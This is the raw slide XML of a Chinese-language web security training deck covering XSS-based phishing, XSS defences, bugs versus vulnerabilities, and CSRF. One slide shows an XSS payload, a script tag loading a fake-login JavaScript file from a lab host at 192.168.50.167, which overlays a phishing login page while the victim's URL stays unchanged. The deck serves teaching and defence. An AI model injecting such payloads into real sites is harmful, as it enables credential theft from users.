            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1014345" y="4043293"/>
            <a:ext cx="8733333" cy="2657143"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3273714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846659"/>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高级钓鱼</a:t>
            </a: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通常钓鱼攻击都是通过伪造相似的网页，再加上一个非常具有迷惑性的域名，比如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>qq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>空间：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>qq.zone.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>。</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这样的钓鱼比较容易被发现，那么利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>可以构造一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>不变的钓鱼网站。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="宋体" pitchFamily="2"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2050" name="Picture 2" descr="https://timgsa.baidu.com/timg?image&amp;quality=80&amp;size=b9999_10000&amp;sec=1496819000590&amp;di=7a40825deabb4a8b04b18ac9637590b6&amp;imgtype=0&amp;src=http%3A%2F%2Fs8.sinaimg.cn%2Fmiddle%2F622134fdgc70124c637e7%266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085" y="2125806"/>
            <a:ext cx="6306435" cy="4323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95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41777" y="315189"/>
            <a:ext cx="10344149" cy="1292662"/>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高级钓鱼</a:t>
            </a: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a:defRPr sz="1800" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFillTx/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>输入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>框中输入：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>&lt;script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>="http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>://192.168.50.167:8080/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>Testxss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>/facklogin.js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>"&gt;&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1041777" y="1499616"/>
            <a:ext cx="4139983" cy="4849224"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5727107" y="1499616"/>
            <a:ext cx="4742857" cy="2066667"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5727107" y="3924228"/>
            <a:ext cx="6214957" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>页面上应该显示的内容不见了，取而代之的是“登陆页面”，此时的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>还是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>192.168.4.144</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
            </a:br>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5404104" y="4750710"/>
            <a:ext cx="6713916" cy="1691907"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1218650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296760" y="445576"/>
            <a:ext cx="10344149" cy="2862322"/>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b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>如何防御</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>漏洞？</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>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smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>Html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>编码</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和参数化查询能够防御</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>注入原理类似，当浏览器收到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>文件时，会通过解析</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>文件形成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>DOM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>树，再根据</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>DOM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>树中的标签来调用相应的引擎来进行解析。</a:t>
            </a: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经过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>Html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>编码的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>”&lt;script&gt;”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>等标签是在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>DOM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>树建立之后加入的，不会影响</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>DOM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>树也不会触发</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>引擎。</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过滤：最好使用白名单，慎用黑名单。</a:t>
            </a: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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="149124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p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1731533" y="314076"/>
            <a:ext cx="8612943" cy="1569660"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat">
            <a:noFill/>
            <a:prstDash val="solid"/>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zh-CN" altLang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>漏洞和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>ug</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>的关系</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="宋体" pitchFamily="2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>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r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>漏洞</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Bug</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>并不等同，他们之间的关系基本可以描述为：大部分的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Bug</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>影响功能性，并不涉及安全性，也就不构成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>漏洞。大部分</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的漏洞来源于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Bug</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，但并不是全部，它们之间只是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>有一</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>个很大的交集。可以用如下这个图来展示它们的关系： </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="宋体" pitchFamily="2"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="图片 11"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3941015" y="2143720"/>
            <a:ext cx="4019048" cy="3114286"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2704733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569660"/>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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>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和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>漏洞区别：</a:t>
            </a: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smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>：设法获取到受害者的身份标识信息，再进行敏感操作。</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smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>：不需要获取受害者的身份标识信息，诱导受害者进行敏感操作</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="宋体" pitchFamily="2"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3074" name="Picture 2" descr="https://timgsa.baidu.com/timg?image&amp;quality=80&amp;size=b9999_10000&amp;sec=1496832583200&amp;di=c3fcf4aef6d17f4b7a6fae7e5e816901&amp;imgtype=0&amp;src=http%3A%2F%2Fwww.secbox.cn%2Fwp-content%2Fuploads%2F2015%2F09%2F81a4b79a2a0118ea2324621199cffefd.jp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597023" y="2072322"/>
            <a:ext cx="5303393" cy="3224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918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461665"/>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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>漏洞案例</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1014345" y="1014747"/>
            <a:ext cx="9276190" cy="2304762"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1014345" y="3395225"/>
            <a:ext cx="3761905" cy="2152381"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5239512" y="4078224"/>
            <a:ext cx="6656832" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>没有加入随机数，也没有对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>进行验证，攻击者可以伪造能够产生敏感</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>请求页面，再诱导受害者点击对应的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
